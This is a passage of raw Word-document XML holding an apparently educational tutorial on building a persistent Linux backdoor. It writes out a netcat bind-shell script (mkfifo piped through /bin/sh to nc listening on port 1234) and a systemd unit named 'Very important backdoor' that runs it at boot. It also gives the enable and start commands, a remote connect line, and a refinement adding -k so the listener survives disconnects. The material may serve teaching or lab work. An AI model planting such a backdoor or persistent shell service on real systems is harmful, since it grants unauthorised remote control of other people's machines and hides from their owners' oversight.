      <w:r w:rsidR="004E4752">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  When you connect to the listener with another machine, use the real IP address instead of the loopback:</w:t>
      </w:r>
      <w:r w:rsidR="004E4752">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="004E4752" w:rsidRPr="004E4752">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc 192.168.77.129 1234</w:t>
      </w:r>
      <w:r w:rsidR="004E4752">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or whatever the IP is.  You can also change the port number </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidR="004E4752">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>it is</w:t>
      </w:r>
      <w:r w:rsidR="004E4752">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the same on both the listener and the client.</w:t>
      </w:r>
      <w:r w:rsidR="00752DC6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5023BBE0" w14:textId="798FB754" w:rsidR="00976502" w:rsidRDefault="00976502">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Note that this is a shell, not a terminal.  Some things will not work here.  Up and down arrows do weird things, and if we try to use sudo to run a command the shell will hang.</w:t>
      </w:r>
      <w:r w:rsidR="007C0818">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="007C0818">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4073757F" wp14:editId="1379A162">
            <wp:extent cx="5981700" cy="10740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79" cy="1080002"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="007C0818">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:t>The ^[[A happened when I typed an up arrow and ^[[B was a down arrow.  The sudo -i caused the shell to hang.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ED8994" w14:textId="4F4B04E2" w:rsidR="00A77E33" w:rsidRDefault="00A77E33" w:rsidP="00A77E33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Next, create a systemd service with our command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32620071" w14:textId="74E097DE" w:rsidR="004E4752" w:rsidRDefault="00A77E33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>This is the instruction from the article at the beginning of this document on how to create a systemd service.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59F37009" wp14:editId="6B1DE4D4">
            <wp:extent cx="5295900" cy="4540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411" cy="4553790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="672F0D6B" w14:textId="4E2C18FA" w:rsidR="00A77E33" w:rsidRDefault="00A77E33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The problem now is that the </w:t>
      </w:r>
      <w:r w:rsidRPr="00976502">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ExecStart</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> line can only hold one command.  Our new, working command has two.  After swearing and Googling when my service did not run with the </w:t>
      </w:r>
      <w:r w:rsidR="00976502">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">two-line version of the command, I found that the line just above, </w:t>
      </w:r>
      <w:r w:rsidR="00976502" w:rsidRPr="00976502">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Type=simple</w:t>
      </w:r>
      <w:r w:rsidR="00976502">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>, limits us to one-line commands.  The first thing I tried, putting the two lines into one line separated by a ‘;’, did not work.  However, the second workaround, putting the two lines into a shell script, did work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC70C1C" w14:textId="2897469F" w:rsidR="00560790" w:rsidRDefault="00560790" w:rsidP="00560790">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Cut to the Chase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779E9AF0" w14:textId="50C95C53" w:rsidR="00976502" w:rsidRDefault="00976502">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>So, first create the shell script.  I named my script backdoor.sh and put it in the same directory where the systemd file backdoor.service will go.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00976502">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sudo nano /etc/systemd/system/backdoor.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7270930E" wp14:editId="7DDF5586">
            <wp:extent cx="6143625" cy="2042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6537" cy="208306"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="169927BE" w14:textId="55976705" w:rsidR="00752DC6" w:rsidRPr="00752DC6" w:rsidRDefault="00976502" w:rsidP="00752DC6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Add a line at the top:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00976502">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>#!/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:t>This tells the OS that we want to run this script in the /bin/sh shell.  (We could also have used /bin/bash)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:t>Then paste in our *working* (yea!) command.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3045E8D8" wp14:editId="6D2A8A75">
            <wp:extent cx="6191250" cy="31684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8719" cy="3177353"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00752DC6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00752DC6" w:rsidRPr="00752DC6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>#!/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C965422" w14:textId="77777777" w:rsidR="00752DC6" w:rsidRPr="00752DC6" w:rsidRDefault="00752DC6" w:rsidP="00752DC6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00752DC6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>rm -f /tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2640FD" w14:textId="77777777" w:rsidR="00752DC6" w:rsidRPr="00752DC6" w:rsidRDefault="00752DC6" w:rsidP="00752DC6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00752DC6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>mkfifo /tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1477579B" w14:textId="1C98234C" w:rsidR="00976502" w:rsidRPr="00752DC6" w:rsidRDefault="00752DC6" w:rsidP="00752DC6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00752DC6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cat /tmp/f | /bin/sh 2&gt;&amp;1 | nc -l 127.0.0.1 1234 &gt; /tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A8731D" w14:textId="21D9DC21" w:rsidR="004E4752" w:rsidRDefault="007C0818">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Remember to make the backdoor.sh file executable:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B515152" wp14:editId="26D5B8A8">
            <wp:extent cx="6134100" cy="20504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2880" cy="217701"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00752DC6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00752DC6" w:rsidRPr="00752DC6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sudo chmod +x /etc/systemd/system/backdoor.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2604822F" w14:textId="599F339F" w:rsidR="007C0818" w:rsidRDefault="00746CA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>As a test, i</w:t>
      </w:r>
      <w:r w:rsidR="007C0818">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>f you run the backdoor.sh file you should get a working backdoor.</w:t>
      </w:r>
      <w:r w:rsidR="007C0818">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="007C0818">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="287284F2" wp14:editId="26B4108A">
            <wp:extent cx="6124575" cy="140110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9676" cy="1404556"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="481830B9" w14:textId="6EB69151" w:rsidR="007C0818" w:rsidRDefault="007C0818">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, create the systemd service file like the article listed, but replace ExecStart with </w:t>
      </w:r>
      <w:r w:rsidR="00746CA5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>the path to our</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell script.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E2B11DB" wp14:editId="2AF4AB7F">
            <wp:extent cx="6124575" cy="366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4364" cy="374044"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3092AE6F" w14:textId="631203B8" w:rsidR="007C0818" w:rsidRDefault="007C0818">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65F0540B" wp14:editId="36F4A919">
            <wp:extent cx="6081296" cy="3095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0382" cy="3100250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCDB70A" w14:textId="77777777" w:rsidR="007C0818" w:rsidRPr="007C0818" w:rsidRDefault="007C0818" w:rsidP="007C0818">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0818">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>[Unit]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF3EAA7" w14:textId="77777777" w:rsidR="007C0818" w:rsidRPr="007C0818" w:rsidRDefault="007C0818" w:rsidP="007C0818">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0818">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Description=Very important backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017DD15A" w14:textId="77777777" w:rsidR="007C0818" w:rsidRPr="007C0818" w:rsidRDefault="007C0818" w:rsidP="007C0818">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0818">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>[Service]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D52483" w14:textId="77777777" w:rsidR="007C0818" w:rsidRPr="007C0818" w:rsidRDefault="007C0818" w:rsidP="007C0818">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0818">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Type=simple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E6A5FC" w14:textId="77777777" w:rsidR="007C0818" w:rsidRPr="007C0818" w:rsidRDefault="007C0818" w:rsidP="007C0818">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0818">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ExecStart=/etc/systemd/system/backdoor.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7A852C" w14:textId="77777777" w:rsidR="007C0818" w:rsidRPr="007C0818" w:rsidRDefault="007C0818" w:rsidP="007C0818">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0818">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>[Install]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452593DE" w14:textId="4A2BE6C3" w:rsidR="007C0818" w:rsidRDefault="007C0818" w:rsidP="007C0818">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0818">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WantedBy=multi-user.target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11409E82" w14:textId="0E5F1E1F" w:rsidR="007C0818" w:rsidRDefault="007C0818" w:rsidP="007C0818">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Here’s a review of the two files we created:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DB47585" wp14:editId="327D69CB">
            <wp:extent cx="6077746"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5808" cy="2632387"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72133A8A" w14:textId="52BDC9EA" w:rsidR="00686B6D" w:rsidRDefault="00686B6D" w:rsidP="007C0818">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Now we need to enable the service and start it.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61DCBCC6" wp14:editId="165402B9">
            <wp:extent cx="6093831" cy="17240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6977" cy="1727744"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00686B6D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sudo systemctl enable /etc/systemd/system/backdoor.service</w:t>
      </w:r>
      <w:r w:rsidRPr="00686B6D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:br/>
        <w:t>sudo systemctl start backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F804C1" w14:textId="13FD7226" w:rsidR="00686B6D" w:rsidRDefault="00686B6D" w:rsidP="007C0818">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>I also ran ss -nat to check to see if I had a process listening on 127.0.0.1 port 1234.  It worked!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D10D4AC" w14:textId="4A88140A" w:rsidR="00686B6D" w:rsidRDefault="00686B6D" w:rsidP="007C0818">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Finally connect with the second terminal.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61758EEF" wp14:editId="098D0627">
            <wp:extent cx="6181725" cy="28052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6665" cy="2816542"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="141AF1E4" w14:textId="1A37757A" w:rsidR="00686B6D" w:rsidRDefault="00686B6D" w:rsidP="007C0818">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>It’s working!  Success!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA29200" w14:textId="0FE31CDB" w:rsidR="00FD573B" w:rsidRDefault="00FD573B" w:rsidP="00FD573B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Refinements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45139C3B" w14:textId="1C9B87A3" w:rsidR="00FD573B" w:rsidRDefault="00FD573B" w:rsidP="00FD573B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Listen Harder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AF2FE4" w14:textId="31E26DFF" w:rsidR="00FD573B" w:rsidRDefault="00FD573B" w:rsidP="00FD573B">
      <w:r>
        <w:t>The service we just created will stop as soon as the remote computer disconnects.  Bummer.  Fix that by using the -k option.  The netcat manual (man nc) describes the -k option this way: “When a connection is completed, listen for another one.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A2A547" w14:textId="0AE48BD5" w:rsidR="00FD573B" w:rsidRDefault="00FD573B" w:rsidP="00FD573B">
      <w:r>
        <w:t>Add the -k option to the code for the backdoor.sh script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CFAABD" w14:textId="77777777" w:rsidR="00FD573B" w:rsidRPr="00752DC6" w:rsidRDefault="00FD573B" w:rsidP="00FD573B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00752DC6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>#!/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED5CE94" w14:textId="77777777" w:rsidR="00FD573B" w:rsidRPr="00752DC6" w:rsidRDefault="00FD573B" w:rsidP="00FD573B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00752DC6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>rm -f /tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B62ED43" w14:textId="77777777" w:rsidR="00FD573B" w:rsidRPr="00752DC6" w:rsidRDefault="00FD573B" w:rsidP="00FD573B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00752DC6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>mkfifo /tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD53142" w14:textId="4BC3E126" w:rsidR="00FD573B" w:rsidRDefault="00FD573B" w:rsidP="00FD573B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00752DC6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /tmp/f | /bin/sh 2&gt;&amp;1 | nc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
